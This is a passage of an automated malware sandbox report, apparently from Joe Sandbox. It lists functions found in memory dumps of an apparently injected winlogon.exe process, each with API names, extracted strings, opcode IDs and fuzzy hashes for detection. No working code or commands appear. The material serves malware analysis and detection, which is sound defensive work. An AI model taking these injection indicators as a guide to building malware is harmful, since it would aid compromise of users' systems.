                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                                • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                                • Opcode ID: 78242e2ad1e66ce797da3b321992a6ad1daff7ac6a80aafc19c0109c88dcfca8
                                                                                                                                                                                                                                                • Instruction ID: 31f0a2f5ea800dff5abde378d94a8cd71f19c1ee93edadf03dca32ece7988c86
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 78242e2ad1e66ce797da3b321992a6ad1daff7ac6a80aafc19c0109c88dcfca8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2A41D233B91B0852FA17CB56A804FD53391BFC9BE9FC94125DD099B784EA3AC4458383
                                                                                                                                                                                                                                                Function 000001CA7D1E104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                                                                                                                                                                                • String ID: d
                                                                                                                                                                                                                                                • API String ID: 3743429067-2564639436
                                                                                                                                                                                                                                                • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                                                                                                                                                                                • Instruction ID: 0332acd1771d854494ee12fb43ad52b5304bce5d0e0612f73963db57a60a753a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2741A1B3614B88C6F761CF21E444B9E77A1F788B89F448129DA8947758DF39C485CB42
                                                                                                                                                                                                                                                Function 000001CA7D1ED5D8 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FlsGetValue.KERNEL32(?,?,?,000001CA7D1ECD4E,?,?,?,?,?,?,?,?,000001CA7D1ED50D,?,?,00000001), ref: 000001CA7D1ED5F7
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,000001CA7D1ECD4E,?,?,?,?,?,?,?,?,000001CA7D1ED50D,?,?,00000001), ref: 000001CA7D1ED616
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,000001CA7D1ECD4E,?,?,?,?,?,?,?,?,000001CA7D1ED50D,?,?,00000001), ref: 000001CA7D1ED63E
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,000001CA7D1ECD4E,?,?,?,?,?,?,?,?,000001CA7D1ED50D,?,?,00000001), ref: 000001CA7D1ED64F
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,000001CA7D1ECD4E,?,?,?,?,?,?,?,?,000001CA7D1ED50D,?,?,00000001), ref: 000001CA7D1ED660
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Value
                                                                                                                                                                                                                                                • String ID: 1%$Y%
                                                                                                                                                                                                                                                • API String ID: 3702945584-1395475152
                                                                                                                                                                                                                                                • Opcode ID: c43ba9056afb091907f0ee91a963f4e74318913cfa62c74dbd7af27afc39a0a2
                                                                                                                                                                                                                                                • Instruction ID: c227e7830e1f9c1d10eb2069a500807f369b07f3f1191aeb5736f632a5f76b06
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c43ba9056afb091907f0ee91a963f4e74318913cfa62c74dbd7af27afc39a0a2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 48114F72F8434881FA5B57226551BE971427F487EAFDC8324693D466D6EE2AC40243C3
                                                                                                                                                                                                                                                Function 000001CA7D1E7520 Relevance: 12.2, APIs: 8, Instructions: 228COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 190073905-0
                                                                                                                                                                                                                                                • Opcode ID: 631ceae67eae31c045c263838f49675c0354f8d7e0c0c05f5239024a302f0f12
                                                                                                                                                                                                                                                • Instruction ID: d61144fdfba89683a24292356ce87fc7abb84e217eee572a164a7874b7477b9c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 631ceae67eae31c045c263838f49675c0354f8d7e0c0c05f5239024a302f0f12
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0481A133F8034D46FA53AB65A441FD97690BF85B8EFD44015AA8847396EB3AC846C7C3
                                                                                                                                                                                                                                                Function 000001CA7D1B6920 Relevance: 12.2, APIs: 8, Instructions: 228COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2638967747.000001CA7D1B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1B0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_1ca7d1b0000_winlogon.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 190073905-0
                                                                                                                                                                                                                                                • Opcode ID: 631ceae67eae31c045c263838f49675c0354f8d7e0c0c05f5239024a302f0f12
                                                                                                                                                                                                                                                • Instruction ID: 48fcc366b1401c45def13d2372391de8a34e7c7d4babd9e2966067a0c4afb970
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 631ceae67eae31c045c263838f49675c0354f8d7e0c0c05f5239024a302f0f12
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6E81D433F8430C8AFA52AB25A451BE93690FFA578CFD49015DA4C5B796DB3BC8418783
                                                                                                                                                                                                                                                Function 000001CA7D1EA148 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                                • String ID: api-ms-
                                                                                                                                                                                                                                                • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                                • Opcode ID: 1bda5a7f51937e5fba9747c90859e34dfa5f89533a2a1b8d1dea998784ab284d
                                                                                                                                                                                                                                                • Instruction ID: 7c5023be7fac9642ddbe2c1919178884c2059021b75bd1e11dad0deec76e08b7
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1bda5a7f51937e5fba9747c90859e34dfa5f89533a2a1b8d1dea998784ab284d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5A31CD33A82709A1FE539B82E900BD43394BF45BA9F990624DD1E1B390DF3BC4488383
                                                                                                                                                                                                                                                Function 000001CA7D1F4324 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                                • String ID: CONOUT$
                                                                                                                                                                                                                                                • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                                • Opcode ID: 4c50c600c840af11fb29c95c0db3c2be4712be37c9ecc349f2f252041d9feab2
                                                                                                                                                                                                                                                • Instruction ID: 8cd734ec53eb78cc3d0a3b69bc30624e61f32c92dd456ae9b483cf1a75deebc3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4c50c600c840af11fb29c95c0db3c2be4712be37c9ecc349f2f252041d9feab2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B111B632B54B5883F3528B52F844B9972A0FB88FE8F940224EE5A87794DF39C404C787
                                                                                                                                                                                                                                                Function 000001CA7D1E14A4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 83memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Heap$Process$Free
                                                                                                                                                                                                                                                • String ID: C:\Windows\system32\winlogon.exe
                                                                                                                                                                                                                                                • API String ID: 3168794593-3603389050
                                                                                                                                                                                                                                                • Opcode ID: 8f6c8013f26ca493c8b85487be1e8632cd5ea831c810228ac57a4b2b7c934696
                                                                                                                                                                                                                                                • Instruction ID: 4ccaf887a55ef58bd9d03d6c91a2764e157fb7b8694f785958393da1e073500b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8f6c8013f26ca493c8b85487be1e8632cd5ea831c810228ac57a4b2b7c934696
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E33180F798EBC88AF352CB7598556893BA0FBC5F48F898015DA4403347DA26D404C783
                                                                                                                                                                                                                                                Function 000001CA7D1ED510 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2506987500-0
                                                                                                                                                                                                                                                • Opcode ID: 5a5575a5d1708c946e79aad68248bc2e3b8df018e302dfb520b8908bc7679156
                                                                                                                                                                                                                                                • Instruction ID: bffa12124b6869ef26d18b49398ff8f6b3a0fec7e1b25ada04cfb4b0cc7ceba9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5a5575a5d1708c946e79aad68248bc2e3b8df018e302dfb520b8908bc7679156
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CD118C32B8834882FA17A3216551BE932627F447FEFDC4724A936477D6EE6AC40183C3
                                                                                                                                                                                                                                                Function 000001CA7D1E19A4 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 517849248-0
                                                                                                                                                                                                                                                • Opcode ID: 8727d58878f2a869f14b8fd26c384ee344685f44cd71b3c6aa4d19fd6db2488a
                                                                                                                                                                                                                                                • Instruction ID: 576a392f1f9a9d95cfcc6bc41593a475a6a70078ac4ae8bda41fbae5dd04e06d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8727d58878f2a869f14b8fd26c384ee344685f44cd71b3c6aa4d19fd6db2488a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E8015B32B45B8886FA11DB52A458B9973A1FB88FC9F884034DE4D43754DF3DC989C782
                                                                                                                                                                                                                                                Function 000001CA7D1E36DC Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 449555515-0
                                                                                                                                                                                                                                                • Opcode ID: 6a4903f23145d629ccf7c0814750504573150cedf00e013b6ac3f495348c8662
                                                                                                                                                                                                                                                • Instruction ID: f8fd27e83b1b72d7f2ce0b504b08d324a200ef1283ed7fae9fb318232fc037c0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6a4903f23145d629ccf7c0814750504573150cedf00e013b6ac3f495348c8662
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C7012176F5274882FB269B51E818B9A72A0FF55F8AF940125C94907754EF3FC4088783
                                                                                                                                                                                                                                                Function 000001CA7D1E1A48 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FinalHandleNamePathlstrlen
                                                                                                                                                                                                                                                • String ID: \\?\
                                                                                                                                                                                                                                                • API String ID: 2719912262-4282027825
                                                                                                                                                                                                                                                • Opcode ID: 5d436592c77a9924c69bcb50891f68179583d79dfa63631e028aef339bed858e
                                                                                                                                                                                                                                                • Instruction ID: 9b292f6370f99936f14c50318c372ff85e96ef2d1b34f4f60cf33b36db74d0c7
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5d436592c77a9924c69bcb50891f68179583d79dfa63631e028aef339bed858e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B8F0AF3374478892FB218B61F894FA97760FB88B8CFC44020CA4942954DF7EC688CB42
                                                                                                                                                                                                                                                Function 000001CA7D1EC208 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                • Opcode ID: 0e03656a98ecf47c8c70bd094229c94189d23a90474f93e2876379b06086d007
                                                                                                                                                                                                                                                • Instruction ID: 2955cdbca312dcd7e5497ff0c8f4b5f7647af41f3e71c17895f5000dcf043701
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0e03656a98ecf47c8c70bd094229c94189d23a90474f93e2876379b06086d007
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 61F06273A5270981FB118B64E844B997321FF85BA9FD40219D56A452E4DF2EC044C383
                                                                                                                                                                                                                                                Function 000001CA7D1E3058 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CombinePath
                                                                                                                                                                                                                                                • String ID: \\.\pipe\
                                                                                                                                                                                                                                                • API String ID: 3422762182-91387939
                                                                                                                                                                                                                                                • Opcode ID: 230e05f875843765b10c94681cacd2039b66fa3fae77185737d73b0c30566c8e
                                                                                                                                                                                                                                                • Instruction ID: 39fc8da7d399a26a4e90035f22321ef295c07e493129d72101e3cc8db3def2e9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 230e05f875843765b10c94681cacd2039b66fa3fae77185737d73b0c30566c8e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 68F0A732B55B8881FA058B53B9145997661FF48FD9F888130EE4E07B18CF3DC4868783
                                                                                                                                                                                                                                                Function 000001CA7D1E5720 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentThread
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2882836952-0
                                                                                                                                                                                                                                                • Opcode ID: 2f21f1b7d680375770059ee47be5c824cdfe53a9a9059a6bad666dfd6aad0ae5
                                                                                                                                                                                                                                                • Instruction ID: 765e8dafc42f728ce51463b2db5c40a7feb60042766906d02ca29a17f2e0185e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2f21f1b7d680375770059ee47be5c824cdfe53a9a9059a6bad666dfd6aad0ae5
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2761FE37A59B48C7F7618B15E450B9AB7A0F788749F900115FA8D83BA4DB7DC540CF82
                                                                                                                                                                                                                                                Function 000001CA7D1F4674 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _set_statfp
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1156100317-0
                                                                                                                                                                                                                                                • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                                                                                                                • Instruction ID: 9956e04d655451dc383e316b6ba75e8c80b983be334d5368c0dfb43c842b6769
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E011A337ED2B0801F6671168D451FE530517F697BCFC40634BAA7066E6DA26C84243C3
                                                                                                                                                                                                                                                Function 000001CA7D1C3A74 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2638967747.000001CA7D1B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1B0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_1ca7d1b0000_winlogon.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _set_statfp
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1156100317-0
                                                                                                                                                                                                                                                • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                                                                                                                • Instruction ID: 79dc0acdce94d256c5547a56f3948224d3601e2aafc90a66b494a27cd80d70a1
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B11E737ED4B0801F6672368E847BE930417F5937CFC80230E56E862EADA66C8D18383
                                                                                                                                                                                                                                                Function 000001CA7D1E8580 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                                • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                                                • Opcode ID: 34f41f65ebeee98072c04c36ffcb08d764f10b3598a8f5a66480d6cdd8a7e9c2
                                                                                                                                                                                                                                                • Instruction ID: 24e0dd9f68721c0c3ca3bd256542bd7075973f55fb31fd1ab5f329473c69f4c1
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 34f41f65ebeee98072c04c36ffcb08d764f10b3598a8f5a66480d6cdd8a7e9c2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3351B033B517988AFB56CF15E444FA87391FB84B8DF908120EA4647B88DB7AC841C782
                                                                                                                                                                                                                                                Function 000001CA7D1EAFC0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                                • String ID: MOC$RCC
                                                                                                                                                                                                                                                • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                                • Opcode ID: 8ebe29515744ec85b4c7a5c69406529571aeda380531785c74bea0d93e5ddae6
                                                                                                                                                                                                                                                • Instruction ID: 1d53925dee3c56d575b373dcbf28b9f574cc5d092cd1563c64954f41c80b0141
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8ebe29515744ec85b4c7a5c69406529571aeda380531785c74bea0d93e5ddae6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D061D173904BC881EB72CF15E540BDABBA0FB85B99F444315EB9843B99CB39D194CB42
                                                                                                                                                                                                                                                Function 000001CA7D1EB370 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2639839393.000001CA7D1E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_1ca7d1e0000_winlogon.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                                • String ID: csm$csm
                                                                                                                                                                                                                                                • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                                • Opcode ID: 54601b73b573f90b6a3621b815e414a07fc66bdc2a6778d7d0011f6600b73964
                                                                                                                                                                                                                                                • Instruction ID: 29bcbea5cc99e7f74d36aef28903cfe833e39e28afdb39bb5195de18103c7c4e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 54601b73b573f90b6a3621b815e414a07fc66bdc2a6778d7d0011f6600b73964
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ED51AF3394038886FB76CF159644B987BA0FB54B8EF984225DA8947BD6CB39C490C783
                                                                                                                                                                                                                                                Function 000001CA7D1BA770 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2638967747.000001CA7D1B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1B0000, based on PE: true
